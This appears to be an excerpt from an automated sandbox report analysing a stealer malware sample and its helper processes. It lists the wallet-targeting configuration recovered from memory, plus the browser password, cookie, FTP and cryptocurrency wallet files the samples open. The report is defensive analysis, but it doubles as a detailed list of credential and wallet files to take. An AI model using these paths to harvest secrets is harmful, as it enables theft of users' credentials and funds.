Source: stealc_default2.exe, 0000001F.00000002.2156458487.000000000114D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: stealc_default2.exe, 0000001F.00000002.2156458487.000000000114D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: stealc_default2.exe, 0000001F.00000002.2156458487.000000000114D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\info.seco~
Source: stealc_default2.exe, 0000001F.00000002.2156458487.000000000114D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\info.seco~
Source: stealc_default2.exe, 0000001F.00000002.2156458487.000000000114D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: stealc_default2.exe, 0000001F.00000002.2156458487.000000000114D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\jaxx\Local Storage\\file__0.localstoragez
Source: stealc_default2.exe, 0000001F.00000002.2156458487.000000000114D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\passphrase.json
Source: stealc_default2.exe, 0000001F.00000002.2156458487.000000000114D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ExodusE#
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: EthereumE#
Source: stealc_default2.exe, 0000001F.00000002.2156458487.000000000114D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\jaxx\Local Storage\\file__0.localstoragez
Source: stealc_default2.exe, 0000001F.00000002.2156458487.000000000114D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Coinomi\Coinomi\wallets\\.n^
Source: stealc_default2.exe, 0000001F.00000002.2156458487.000000000114D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\info.seco~
Source: stealc_default2.exe, 0000001F.00000002.2156458487.000000000114D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: stealc_default2.exe, 0000001F.00000002.2156458487.000000000114D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000019.00000002.1926189866.0000000000479000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: set_UseMachineKeyStore
Source: stealc_default2.exe, 0000001F.00000002.2156458487.000000000114D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: stealc_default2.exe, 0000001F.00000002.2156458487.0000000001112000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\.W

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
